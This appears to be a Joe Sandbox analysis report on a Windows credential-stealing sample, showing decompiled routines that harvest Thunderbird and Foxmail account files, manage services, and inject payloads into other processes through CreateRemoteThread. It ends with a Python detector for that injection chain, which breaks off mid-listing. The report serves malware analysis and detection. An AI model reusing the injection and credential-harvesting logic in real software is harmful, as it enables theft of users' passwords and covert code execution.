                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,02D1A760,?,00000104,00000000), ref: 02D1B83E
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B849
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B854
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B85F
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B86A
                                                                      • Part of subcall function 02D1B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B957
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                                                    • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                                    • API String ID: 1065485167-1863067114
                                                                    • Opcode ID: aff3a7f073842810070ffa697cf68d3b8d069444416deefde412ebc21bd557d4
                                                                    • Instruction ID: 240b250751bff00a8c008bbbfa29b79010b524bfc1cf1b8a13809dfc36b9da5d
                                                                    • Opcode Fuzzy Hash: aff3a7f073842810070ffa697cf68d3b8d069444416deefde412ebc21bd557d4
                                                                    • Instruction Fuzzy Hash: F2E1E7B1D00118ABEB15EBA0EC91DEEB77AEF54304F50406AE506A7B90DF356E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1D508(short** _a4) {
                                                                    				void* _t2;
                                                                    				int _t8;
                                                                    				void* _t13;
                                                                    				int _t15;
                                                                    				void* _t17;
                                                                    
                                                                    				_t15 = 0;
                                                                    				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                                                    				_t17 = _t2;
                                                                    				if(_t17 != 0) {
                                                                    					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                                                    					if(_t13 != 0) {
                                                                    						if(StartServiceW(_t13, 0, 0) != 0) {
                                                                    							L6:
                                                                    							_t15 = 1;
                                                                    							L7:
                                                                    							CloseServiceHandle(_t17);
                                                                    							CloseServiceHandle(_t13);
                                                                    							_t8 = _t15;
                                                                    							L8:
                                                                    							return _t8;
                                                                    						}
                                                                    						if(GetLastError() != 0x420) {
                                                                    							goto L7;
                                                                    						}
                                                                    						Sleep(0x7d0);
                                                                    						if(StartServiceW(_t13, 0, 0) == 0) {
                                                                    							goto L7;
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    					CloseServiceHandle(_t17);
                                                                    					_t8 = 0;
                                                                    					goto L8;
                                                                    				}
                                                                    				return _t2;
                                                                    			}

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D517
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 02D1D52C
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D539
                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 02D1D546
                                                                    • GetLastError.KERNEL32 ref: 02D1D550
                                                                    • Sleep.KERNEL32(000007D0), ref: 02D1D562
                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 02D1D56B
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D57F
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D582
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 104619213-3071072050
                                                                    • Opcode ID: c52b98ebf536f75d1ec08bdbc108d1cd43dcb661d4cc1521842604a6f71ce7e0
                                                                    • Instruction ID: bcd7b9a5253640592b41760d50b90a67f8823f716520d4de05ae3a15b8ebcb2a
                                                                    • Opcode Fuzzy Hash: c52b98ebf536f75d1ec08bdbc108d1cd43dcb661d4cc1521842604a6f71ce7e0
                                                                    • Instruction Fuzzy Hash: B001D471B8026477E2301B22BD4DF5B3F6DDBE6769B510424FA06D2300DB64CD54C6B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E02D1DA5B(intOrPtr __ecx) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				short* _v24;
                                                                    				signed int _v28;
                                                                    				short** _v32;
                                                                    				short* _v36;
                                                                    				signed int _v40;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr* _t66;
                                                                    				char* _t69;
                                                                    				void* _t90;
                                                                    				intOrPtr* _t91;
                                                                    				intOrPtr _t92;
                                                                    				intOrPtr _t105;
                                                                    				intOrPtr* _t112;
                                                                    				intOrPtr _t113;
                                                                    				char _t114;
                                                                    				signed int _t115;
                                                                    				signed int _t116;
                                                                    				void* _t117;
                                                                    				void* _t119;
                                                                    
                                                                    				_t113 = __ecx;
                                                                    				_v44 = __ecx;
                                                                    				_v20 = 0;
                                                                    				_v16 = 0;
                                                                    				_v8 = 0;
                                                                    				_v24 = 0;
                                                                    				_v36 = 0;
                                                                    				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                                                    				if(_t90 == 0) {
                                                                    					L9:
                                                                    					_v40 = _v40 & 0x00000000;
                                                                    					L10:
                                                                    					E02D15EA5(_v24);
                                                                    					return _v40;
                                                                    				}
                                                                    				_v40 = 1;
                                                                    				_v32 = _t113 + 0x28;
                                                                    				while(1) {
                                                                    					L2:
                                                                    					_v16 = 0;
                                                                    					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                                                    					_t114 = _v20;
                                                                    					_t66 = E02D15EFF(_t114);
                                                                    					_t112 = _t66;
                                                                    					_t69 =  &_v20;
                                                                    					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                                                    					if(_t69 == 0 && GetLastError() != 0xea) {
                                                                    						goto L9;
                                                                    					}
                                                                    					CloseServiceHandle(_t90);
                                                                    					_t115 = 0;
                                                                    					if(_v8 <= 0) {
                                                                    						goto L9;
                                                                    					}
                                                                    					_t91 = _t112;
                                                                    					while( *_t91 != 0) {
                                                                    						E02D135E5( &_v12,  *_t91);
                                                                    						if(E02D13248( &_v12, _v32) != 0) {
                                                                    							_t116 = _t115 * 0x2c;
                                                                    							E02D13437( &_v24, E02D135E5( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                                                    							E02D15EA5(_v28);
                                                                    							_t92 = _v44;
                                                                    							_v28 = _v28 & 0x00000000;
                                                                    							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                                                    							E02D15EA5(_v12);
                                                                    							_v12 = _v12 & 0x00000000;
                                                                    							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                                                    								_t105 = _v8;
                                                                    								_t117 = 0;
                                                                    								if(_t105 == 0) {
                                                                    									goto L10;
                                                                    								}
                                                                    								while( *_t112 != 0) {
                                                                    									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                                                    										L21:
                                                                    										_t117 = _t117 + 1;
                                                                    										_t112 = _t112 + 0x2c;
                                                                    										if(_t117 < _t105) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L10;
                                                                    									}
                                                                    									E02D135E5( &_v12,  *_t112);
                                                                    									if(lstrcmpW(_v12, _v24) != 0) {
                                                                    										E02D135E5(_t119,  *_t112);
                                                                    										E02D121BD(_t92 + 0x44,  &_v12);
                                                                    									}
                                                                    									E02D15EA5(_v12);
                                                                    									_v12 = _v12 & 0x00000000;
                                                                    									_t105 = _v8;
                                                                    									goto L21;
                                                                    								}
                                                                    								goto L10;
                                                                    							}
                                                                    							if(_v36 == 1) {
                                                                    								goto L9;
                                                                    							}
                                                                    							E02D1D49C(_v32, 2);
                                                                    							E02D1D508(_v32);
                                                                    							_v36 = 1;
                                                                    							E02D11099(_t112);
                                                                    							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                                                    							if(_t90 != 0) {
                                                                    								goto L2;
                                                                    							}
                                                                    							goto L9;
                                                                    						}
                                                                    						E02D15EA5(_v12);
                                                                    						_v12 = _v12 & 0x00000000;
                                                                    						_t91 = _t91 + 0x2c;
                                                                    						_t115 = _t115 + 1;
                                                                    						if(_t115 < _v8) {
                                                                    							continue;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    					goto L9;
                                                                    				}
                                                                    				goto L9;
                                                                    			}

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 02D1DA82
                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 02D1DAB9
                                                                      • Part of subcall function 02D15EFF: GetProcessHeap.KERNEL32(00000008,?,02D12FA7,02D15A42,?,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F02
                                                                      • Part of subcall function 02D15EFF: RtlAllocateHeap.NTDLL(00000000,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F09
                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 02D1DAE2
                                                                    • GetLastError.KERNEL32 ref: 02D1DAEC
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1DAFA
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 02D1DBBB
                                                                    • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 02D1DBFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 899334174-3071072050
                                                                    • Opcode ID: e2622f4dede44bac319d71da4e61523086f4204aafd4abe87bb9cd3ccd1d0f7a
                                                                    • Instruction ID: dc36aa9fdbd9cf0f6a13038dfd1f82fc740cbe6fe3106946e833e179876f0fb5
                                                                    • Opcode Fuzzy Hash: e2622f4dede44bac319d71da4e61523086f4204aafd4abe87bb9cd3ccd1d0f7a
                                                                    • Instruction Fuzzy Hash: 42516E71D00219BBEB15DFA0E995BEEB7BAEF58305F100469E502B6780EB749E44CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			// Remote-thread injection into the process whose PID is _a4. __ecx points at the
                                                                    			// payload and __edx is its length. Returns the new thread handle, or -1 (OpenProcess
                                                                    			// failed), -2 (allocation failed) or -3 (write failed).
                                                                    			E02D179E8(void* __ecx, long __edx, long _a4) {
                                                                    				long _v8;
                                                                    				long _v12;
                                                                    				long _v16;
                                                                    				void* _v20;
                                                                    				void* _v24;
                                                                    				signed int _t17;
                                                                    				void* _t19;
                                                                    				void* _t22;
                                                                    				long _t32;
                                                                    				_Unknown_base(*)()* _t38;
                                                                    				void* _t40;
                                                                    
                                                                    				_t32 = __edx;
                                                                    				_v24 = __ecx;
                                                                    				if( *0x2d29694 == 0) {
                                                                    					 *0x2d29694 = E02D18617() != 0; // one-time init; E02D18617 calls IsWow64Process (see the subcall APIs below)
                                                                    				}
                                                                    				_t17 = OpenProcess(0x1fffff, 0, _a4); // 0x1fffff = PROCESS_ALL_ACCESS
                                                                    				_t40 = _t17;
                                                                    				if(_t40 != 0) {
                                                                    					// 1 MiB, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): the landing zone for the payload
                                                                    					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
                                                                    					if(_t38 == 0) {
                                                                    						L12:
                                                                    						_push(0xfffffffe);
                                                                    						L13:
                                                                    						_pop(_t19);
                                                                    						L14:
                                                                    						return _t19;
                                                                    					}
                                                                    					_v16 = _v16 & 0x00000000;
                                                                    					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16); // redundant: the region was already allocated RWX
                                                                    					// second, 0x100-byte RWX region at the caller-chosen address 0x33370000
                                                                    					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
                                                                    					_v20 = _t22;
                                                                    					if(_t22 == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					_v8 = _v8 & 0x00000000;
                                                                    					// writes the literal "XXXXXX" marker into the fixed-address region (E02D11133 supplies the string length)
                                                                    					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E02D11133("XXXXXX"),  &_v8) == 0 || _v8 != E02D11133("XXXXXX")) {
                                                                    						L11:
                                                                    						_push(0xfffffffd);
                                                                    						goto L13;
                                                                    					} else {
                                                                    						_v12 = _v12 & 0x00000000;
                                                                    						// copies _t32 (__edx) bytes of payload from _v24 (__ecx) into the RWX region
                                                                    						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
                                                                    							goto L11;
                                                                    						} else {
                                                                    							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0); // run the payload from its first byte in the target
                                                                    							goto L14;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return _t17 | 0xffffffff;
                                                                    				}
                                                                    			}
                                                                    Instruction addresses for the listing above (decompiler line map, in order): 0x02d179f7 0x02d179f9 0x02d179fc 0x02d17a05 0x02d17a05 0x02d17a16 0x02d17a1c 0x02d17a20 0x02d17a40 0x02d17a44 0x02d17ae9 0x02d17ae9 0x02d17aeb 0x02d17aeb 0x02d17aec 0x00000000 0x02d17aec 0x02d17a4a 0x02d17a5b 0x02d17a73 0x02d17a79 0x02d17a7e 0x00000000 0x00000000 0x02d17a80 0x02d17aa5 0x02d17ae5 0x02d17ae5 0x00000000 0x02d17ab7 0x02d17ab7 0x02d17acd 0x00000000 0x02d17ad4 0x02d17add 0x00000000 0x02d17add 0x02d17acd 0x02d17a22 0x00000000 0x02d17a22

                                                                    APIs
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 02D17A16
                                                                      • Part of subcall function 02D18617: GetCurrentProcess.KERNEL32(02D29698,02D17A03,?,?,?,?), ref: 02D1861C
                                                                      • Part of subcall function 02D18617: IsWow64Process.KERNEL32(00000000), ref: 02D18623
                                                                      • Part of subcall function 02D18617: GetProcessHeap.KERNEL32 ref: 02D18629
                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 02D17A3A
                                                                    • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 02D17A5B
                                                                    • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 02D17A73
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 02D17A9D
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D17AC5
                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D17ADD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                                    • String ID: XXXXXX
                                                                    • API String ID: 813767414-582547948
                                                                    • Opcode ID: 903e6ea5146465f23a9922f469695ea0930cf5fa7e702588e539d03c46f7849b
                                                                    • Instruction ID: 58c1df926f8a8a7922f6db5e195baa9635083b156005d4b7d2ae27439f99a731
                                                                    • Opcode Fuzzy Hash: 903e6ea5146465f23a9922f469695ea0930cf5fa7e702588e539d03c46f7849b
                                                                    • Instruction Fuzzy Hash: DC21C171A85215BAFB2196A0AD04FBFBB6CAB01715F210115FA14E02D0EBB48E44C679
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Walks every subdirectory of the path stored at 0x2d296a8 and opens
                                                                    			// <base>\<subdir>\Accounts\Account.rec0 in each one. Account.rec0 is the
                                                                    			// per-account store Foxmail keeps under Storage\<account>\Accounts, which is
                                                                    			// what the report's "Tries to steal Mail credentials" signature reflects.
                                                                    			E02D19DF6(intOrPtr __ecx) {
                                                                    				char _v272;
                                                                    				struct _WIN32_FIND_DATAA _v592;
                                                                    				char _v856;
                                                                    				char _v1120;
                                                                    				intOrPtr _t31;
                                                                    				void* _t36;
                                                                    
                                                                    				_t31 = __ecx;
                                                                    				GetFullPathNameA(0x2d296a8, 0x104,  &_v856, 0);   // resolve the base directory
                                                                    				PathCombineA( &_v1120,  &_v856, "*");           // "<base>\*" search pattern
                                                                    				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                                                    				if(_t36 != 0xffffffff) {
                                                                    					do {
                                                                    						// keep entries whose only attribute bit is FILE_ATTRIBUTE_DIRECTORY (0x10)
                                                                    						// and whose name does not start with '.' (skips "." and "..")
                                                                    						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                                                    							PathCombineA( &_v272, 0x2d296a8,  &(_v592.cFileName));
                                                                    							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                                                    							E02D19ADF(_t31,  &_v272); // opens the file for reading (CreateFileA, see the subcall APIs below)
                                                                    						}
                                                                    					} while (FindNextFileA(_t36,  &_v592) != 0);
                                                                    					// note: the find handle is never closed
                                                                    				}
                                                                    				return 0;
                                                                    			}
                                                                    Instruction addresses for the listing above (decompiler line map, in order): 0x02d19e15 0x02d19e17 0x02d19e36 0x02d19e4c 0x02d19e51 0x02d19e53 0x02d19e5f 0x02d19e7d 0x02d19e8c 0x02d19e97 0x02d19e97 0x02d19eaa 0x02d19e53 0x02d19eb4

                                                                    APIs
                                                                    • GetFullPathNameA.KERNEL32(02D296A8,00000104,?,00000000), ref: 02D19E17
                                                                    • PathCombineA.SHLWAPI(?,?,02D25F88), ref: 02D19E36
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D19E46
                                                                    • PathCombineA.SHLWAPI(?,02D296A8,0000002E), ref: 02D19E7D
                                                                    • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 02D19E8C
                                                                      • Part of subcall function 02D19ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 02D19AFC
                                                                      • Part of subcall function 02D19ADF: GetLastError.KERNEL32 ref: 02D19B09
                                                                      • Part of subcall function 02D19ADF: CloseHandle.KERNEL32(00000000), ref: 02D19B10
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02D19EA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                                    • String ID: .$Accounts\Account.rec0
                                                                    • API String ID: 3873318193-2526347284
                                                                    • Opcode ID: e196209daf4bfd8c51ae6d09ea35bca74d6eb4cd3901a17f384c2d4bef9e4c37
                                                                    • Instruction ID: 578e4519eddbeb475daa15d63fb4874dcc71a74ba32f8048b91906af05ef957d
                                                                    • Opcode Fuzzy Hash: e196209daf4bfd8c51ae6d09ea35bca74d6eb4cd3901a17f384c2d4bef9e4c37
                                                                    • Instruction Fuzzy Hash: 6E1186B294122C6BEB20D6A4EC98EEE776CEB54214F1045E6A509D3280E7749E8C8F60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Second injector: stages the embedded 0x800-byte blob at 0x2d29158 into the
                                                                    			// process whose PID is __edx and starts it at blob+0x10e, passing a 0x103-byte
                                                                    			// parameter block that holds this process's PID followed by its own module path.
                                                                    			// No call is error-checked.
                                                                    			E02D21FD8(long __edx) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				char _v268;
                                                                    				void _v272;
                                                                    				void* _t25;
                                                                    				void* _t27;
                                                                    				void* _t33;
                                                                    				void* _t37;
                                                                    
                                                                    				_t33 = OpenProcess(0x1fffff, 0, __edx);                // PROCESS_ALL_ACCESS
                                                                    				_v8 = _t33;
                                                                    				_v272 = GetCurrentProcessId();                          // parameter block starts with the injector's own PID
                                                                    				_t35 = E02D11085(0xff);                                 // heap buffer (GetProcessHeap/RtlAllocateHeap, see the subcall APIs below)
                                                                    				GetModuleFileNameA(0, _t13, 0xff);                      // own module path; _t13 is an undeclared decompiler temporary, the buffer from E02D11085 is the only candidate
                                                                    				E02D11172( &_v268, _t35);                               // copy the path into the block after the PID
                                                                    				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);    // RWX region for the blob
                                                                    				WriteProcessMemory(_t33, _t27, 0x2d29158, 0x800, 0);    // copy the embedded blob
                                                                    				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);       // redundant: already RWX
                                                                    				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);        // PAGE_READWRITE region for the parameter block
                                                                    				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                                                    				_t9 = _t27 + 0x10e; // 0x10e                            // thread entry sits 0x10e bytes into the blob, not at its base
                                                                    				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);  // lpParameter = parameter block
                                                                    				 *0x2e5cbec = _t25;                                      // thread handle kept in a global
                                                                    				return _t25;
                                                                    			}
                                                                    Instruction addresses for the listing above (decompiler line map, in order): 0x02d21ff2 0x02d21ff4 0x02d22002 0x02d22010 0x02d22015 0x02d22023 0x02d2204d 0x02d22057 0x02d22068 0x02d22083 0x02d22095 0x02d22099 0x02d220a8 0x02d220b0 0x02d220b7

                                                                    APIs
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,745D0770,00000000), ref: 02D21FEC
                                                                    • GetCurrentProcessId.KERNEL32 ref: 02D21FF7
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 02D22015
                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 02D2203F
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,02D29158,00000800,00000000), ref: 02D22057
                                                                    • VirtualProtectEx.KERNEL32(02D21FD3,00000000,00000800,00000040,?), ref: 02D22068
                                                                    • VirtualAllocEx.KERNEL32(02D21FD3,00000000,00000103,00003000,00000004), ref: 02D2207F
                                                                    • WriteProcessMemory.KERNEL32(02D21FD3,00000000,?,00000103,00000000), ref: 02D22095
                                                                    • CreateRemoteThread.KERNEL32(02D21FD3,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 02D220A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                                    • String ID:
                                                                    • API String ID: 900395357-0
                                                                    • Opcode ID: b423cfd597ba0ef7ff41d378285cb056ec8963adc1058644b6c491f67aaa8aa3
                                                                    • Instruction ID: 553d9b22c121bd5697e2cb9f9d6dc2120ac676245665e773e6a0457f0b538b8c
                                                                    • Opcode Fuzzy Hash: b423cfd597ba0ef7ff41d378285cb056ec8963adc1058644b6c491f67aaa8aa3
                                                                    • Instruction Fuzzy Hash: 02219671A80218BEF7209B51DD4AFEB7B6CEB54750F210165FB05A62C0DAF06E848F64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
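Added example (not part of the Joe Sandbox report or of the sample): a checker that reads API listings in the report's own bullet format, decodes the OpenProcess access mask and the VirtualAllocEx/VirtualProtectEx allocation and protection flags, and flags the OpenProcess, VirtualAllocEx(RWX), WriteProcessMemory, CreateRemoteThread chain that both E02D179E8 and E02D21FD8 exhibit. The two trace strings are copied from the "APIs" listings of those routines; the constant names and values are the Win32 ones; the 0x1000 cutoff used to call a thread start address an offset rather than a region base is this example's own heuristic.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the "APIs" listings Joe Sandbox printed for E02D179E8 and
# E02D21FD8 in this report, copied verbatim (one bullet per call, Win32 argument order).
TRACE_E02D179E8 = """\
• OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 02D17A16
  • Part of subcall function 02D18617: IsWow64Process.KERNEL32(00000000), ref: 02D18623
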